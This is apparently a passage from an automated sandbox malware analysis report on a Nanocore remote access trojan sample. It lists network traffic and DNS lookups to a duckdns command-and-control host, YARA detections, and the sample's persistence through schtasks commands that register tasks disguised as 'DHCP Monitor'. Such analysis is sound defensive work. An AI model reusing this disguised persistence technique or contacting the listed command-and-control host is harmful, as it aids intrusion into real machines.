              Apr 8, 2021 17:22:55.734447956 CEST497358092192.168.2.540.71.91.165
              Apr 8, 2021 17:22:55.889900923 CEST80924973540.71.91.165192.168.2.5
              Apr 8, 2021 17:22:56.733232021 CEST497358092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:00.787394047 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:00.891832113 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:00.891910076 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:00.892622948 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:01.012259007 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:01.027307987 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:01.133057117 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:01.186083078 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:01.990158081 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:02.149413109 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:02.149579048 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:02.230698109 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:02.252604961 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:02.252705097 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:02.434218884 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:02.587645054 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:02.587831974 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:02.693125010 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:02.733082056 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:02.837759972 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:02.889278889 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:03.046912909 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:03.201199055 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:05.996118069 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:06.046546936 CEST497368092192.168.2.540.71.91.165
              Apr 8, 2021 17:23:10.194027901 CEST80924973640.71.91.165192.168.2.5
              Apr 8, 2021 17:23:10.249382019 CEST497368092192.168.2.540.71.91.165

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 8, 2021 17:20:52.777942896 CEST6530753192.168.2.58.8.8.8
              Apr 8, 2021 17:20:52.792874098 CEST53653078.8.8.8192.168.2.5
              Apr 8, 2021 17:20:52.908107042 CEST6434453192.168.2.58.8.8.8
              Apr 8, 2021 17:20:52.920916080 CEST53643448.8.8.8192.168.2.5
              Apr 8, 2021 17:20:53.738787889 CEST6206053192.168.2.58.8.8.8
              Apr 8, 2021 17:20:53.753365040 CEST53620608.8.8.8192.168.2.5
              Apr 8, 2021 17:20:54.499186993 CEST6180553192.168.2.58.8.8.8
              Apr 8, 2021 17:20:54.512229919 CEST53618058.8.8.8192.168.2.5
              Apr 8, 2021 17:20:54.952914000 CEST5479553192.168.2.58.8.8.8
              Apr 8, 2021 17:20:54.971004009 CEST53547958.8.8.8192.168.2.5
              Apr 8, 2021 17:21:03.811711073 CEST4955753192.168.2.58.8.8.8
              Apr 8, 2021 17:21:03.824161053 CEST53495578.8.8.8192.168.2.5
              Apr 8, 2021 17:21:04.628942966 CEST6173353192.168.2.58.8.8.8
              Apr 8, 2021 17:21:04.642151117 CEST53617338.8.8.8192.168.2.5
              Apr 8, 2021 17:21:06.808931112 CEST6544753192.168.2.58.8.8.8
              Apr 8, 2021 17:21:06.822011948 CEST53654478.8.8.8192.168.2.5
              Apr 8, 2021 17:21:07.621742010 CEST5244153192.168.2.58.8.8.8
              Apr 8, 2021 17:21:07.634968996 CEST53524418.8.8.8192.168.2.5
              Apr 8, 2021 17:21:09.236407995 CEST6217653192.168.2.58.8.8.8
              Apr 8, 2021 17:21:09.249181986 CEST53621768.8.8.8192.168.2.5
              Apr 8, 2021 17:21:16.772994041 CEST5959653192.168.2.58.8.8.8
              Apr 8, 2021 17:21:16.785816908 CEST53595968.8.8.8192.168.2.5
              Apr 8, 2021 17:21:17.609308958 CEST6529653192.168.2.58.8.8.8
              Apr 8, 2021 17:21:17.623075962 CEST53652968.8.8.8192.168.2.5
              Apr 8, 2021 17:21:19.230293989 CEST6318353192.168.2.58.8.8.8
              Apr 8, 2021 17:21:19.411761999 CEST53631838.8.8.8192.168.2.5
              Apr 8, 2021 17:21:20.604794979 CEST6015153192.168.2.58.8.8.8
              Apr 8, 2021 17:21:20.645472050 CEST53601518.8.8.8192.168.2.5
              Apr 8, 2021 17:21:29.107058048 CEST5696953192.168.2.58.8.8.8
              Apr 8, 2021 17:21:29.293220043 CEST53569698.8.8.8192.168.2.5
              Apr 8, 2021 17:21:34.792303085 CEST5516153192.168.2.58.8.8.8
              Apr 8, 2021 17:21:34.808309078 CEST53551618.8.8.8192.168.2.5
              Apr 8, 2021 17:21:41.324934959 CEST5475753192.168.2.58.8.8.8
              Apr 8, 2021 17:21:41.338340998 CEST53547578.8.8.8192.168.2.5
              Apr 8, 2021 17:21:44.674228907 CEST4999253192.168.2.58.8.8.8
              Apr 8, 2021 17:21:44.686163902 CEST53499928.8.8.8192.168.2.5
              Apr 8, 2021 17:21:48.354012966 CEST6007553192.168.2.58.8.8.8
              Apr 8, 2021 17:21:48.535795927 CEST53600758.8.8.8192.168.2.5
              Apr 8, 2021 17:21:55.362834930 CEST5501653192.168.2.58.8.8.8
              Apr 8, 2021 17:21:55.377132893 CEST53550168.8.8.8192.168.2.5
              Apr 8, 2021 17:21:57.871968031 CEST6434553192.168.2.58.8.8.8
              Apr 8, 2021 17:21:57.891774893 CEST53643458.8.8.8192.168.2.5
              Apr 8, 2021 17:22:01.625776052 CEST5712853192.168.2.58.8.8.8
              Apr 8, 2021 17:22:01.638365984 CEST53571288.8.8.8192.168.2.5
              Apr 8, 2021 17:22:07.701024055 CEST5479153192.168.2.58.8.8.8
              Apr 8, 2021 17:22:07.714009047 CEST53547918.8.8.8192.168.2.5
              Apr 8, 2021 17:22:14.676337957 CEST5046353192.168.2.58.8.8.8
              Apr 8, 2021 17:22:14.888746977 CEST53504638.8.8.8192.168.2.5
              Apr 8, 2021 17:22:19.713126898 CEST5039453192.168.2.58.8.8.8
              Apr 8, 2021 17:22:19.727790117 CEST53503948.8.8.8192.168.2.5
              Apr 8, 2021 17:22:25.775541067 CEST5853053192.168.2.58.8.8.8
              Apr 8, 2021 17:22:25.788817883 CEST53585308.8.8.8192.168.2.5
              Apr 8, 2021 17:22:31.701319933 CEST5381353192.168.2.58.8.8.8
              Apr 8, 2021 17:22:31.715224028 CEST53538138.8.8.8192.168.2.5
              Apr 8, 2021 17:22:33.610249043 CEST6373253192.168.2.58.8.8.8
              Apr 8, 2021 17:22:33.791585922 CEST53637328.8.8.8192.168.2.5
              Apr 8, 2021 17:22:34.250060081 CEST5734453192.168.2.58.8.8.8
              Apr 8, 2021 17:22:34.270764112 CEST53573448.8.8.8192.168.2.5
              Apr 8, 2021 17:22:39.213460922 CEST5445053192.168.2.58.8.8.8
              Apr 8, 2021 17:22:39.231551886 CEST53544508.8.8.8192.168.2.5
              Apr 8, 2021 17:22:40.763470888 CEST5926153192.168.2.58.8.8.8
              Apr 8, 2021 17:22:40.776850939 CEST53592618.8.8.8192.168.2.5
              Apr 8, 2021 17:22:47.613575935 CEST5715153192.168.2.58.8.8.8
              Apr 8, 2021 17:22:47.627650023 CEST53571518.8.8.8192.168.2.5
              Apr 8, 2021 17:22:51.380856037 CEST5941353192.168.2.58.8.8.8
              Apr 8, 2021 17:22:51.408750057 CEST53594138.8.8.8192.168.2.5
              Apr 8, 2021 17:22:53.967757940 CEST6051653192.168.2.58.8.8.8
              Apr 8, 2021 17:22:53.981085062 CEST53605168.8.8.8192.168.2.5
              Apr 8, 2021 17:23:00.772382021 CEST5164953192.168.2.58.8.8.8
              Apr 8, 2021 17:23:00.785746098 CEST53516498.8.8.8192.168.2.5

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Apr 8, 2021 17:21:19.230293989 CEST192.168.2.58.8.8.80x42aStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:21:29.107058048 CEST192.168.2.58.8.8.80x22b0Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:21:34.792303085 CEST192.168.2.58.8.8.80x6924Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:21:41.324934959 CEST192.168.2.58.8.8.80xc909Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:21:48.354012966 CEST192.168.2.58.8.8.80x1522Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:21:55.362834930 CEST192.168.2.58.8.8.80xbe28Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:01.625776052 CEST192.168.2.58.8.8.80xb9feStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:07.701024055 CEST192.168.2.58.8.8.80x8a6Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:14.676337957 CEST192.168.2.58.8.8.80xd02aStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:19.713126898 CEST192.168.2.58.8.8.80xab6aStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:25.775541067 CEST192.168.2.58.8.8.80xafbfStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:33.610249043 CEST192.168.2.58.8.8.80x47e1Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:40.763470888 CEST192.168.2.58.8.8.80x9db0Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:47.613575935 CEST192.168.2.58.8.8.80x6edcStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:22:53.967757940 CEST192.168.2.58.8.8.80x116fStandard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)
              Apr 8, 2021 17:23:00.772382021 CEST192.168.2.58.8.8.80x73b1Standard query (0)backu4734.duckdns.orgA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Apr 8, 2021 17:21:19.411761999 CEST8.8.8.8192.168.2.50x42aNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:21:29.293220043 CEST8.8.8.8192.168.2.50x22b0No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:21:34.808309078 CEST8.8.8.8192.168.2.50x6924No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:21:41.338340998 CEST8.8.8.8192.168.2.50xc909No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:21:48.535795927 CEST8.8.8.8192.168.2.50x1522No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:21:55.377132893 CEST8.8.8.8192.168.2.50xbe28No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:01.638365984 CEST8.8.8.8192.168.2.50xb9feNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:07.714009047 CEST8.8.8.8192.168.2.50x8a6No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:14.888746977 CEST8.8.8.8192.168.2.50xd02aNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:19.727790117 CEST8.8.8.8192.168.2.50xab6aNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:25.788817883 CEST8.8.8.8192.168.2.50xafbfNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:33.791585922 CEST8.8.8.8192.168.2.50x47e1No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:40.776850939 CEST8.8.8.8192.168.2.50x9db0No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:47.627650023 CEST8.8.8.8192.168.2.50x6edcNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:22:53.981085062 CEST8.8.8.8192.168.2.50x116fNo error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)
              Apr 8, 2021 17:23:00.785746098 CEST8.8.8.8192.168.2.50x73b1No error (0)backu4734.duckdns.org40.71.91.165A (IP address)IN (0x0001)

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: bGf2H3tXGg.exe PID: 4656 Parent PID: 5736

              General

              Start time:17:20:58
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\bGf2H3tXGg.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: bGf2H3tXGg.exe PID: 204 Parent PID: 4656

              General

              Start time:17:21:09
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\bGf2H3tXGg.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              Chronological Activities

              Analysis Process: schtasks.exe PID: 6280 Parent PID: 204

              General

              Start time:17:21:16
              Start date:08/04/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'
              Imagebase:0xb50000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 6288 Parent PID: 6280

              General

              Start time:17:21:16
              Start date:08/04/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7ecfc0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: schtasks.exe PID: 6320 Parent PID: 204

              General

              Start time:17:21:17
              Start date:08/04/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'
              Imagebase:0x7ff797770000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 6456 Parent PID: 6320

              General

              Start time:17:21:17
              Start date:08/04/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7ecfc0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: bGf2H3tXGg.exe PID: 6468 Parent PID: 904

              General

              Start time:17:21:17
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\bGf2H3tXGg.exe 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6600 Parent PID: 904

              General

              Start time:17:21:20
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 51%, Virustotal, Browse
              • Detection: 16%, Metadefender, Browse
              • Detection: 69%, ReversingLabs
              Reputation:low

              Chronological Activities

              Analysis Process: bGf2H3tXGg.exe PID: 6704 Parent PID: 6468

              General

              Start time:17:21:28
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\bGf2H3tXGg.exe 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6752 Parent PID: 3472

              General

              Start time:17:21:29
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 6816 Parent PID: 6600

              General

              Start time:17:21:31
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, Author: Joe Security
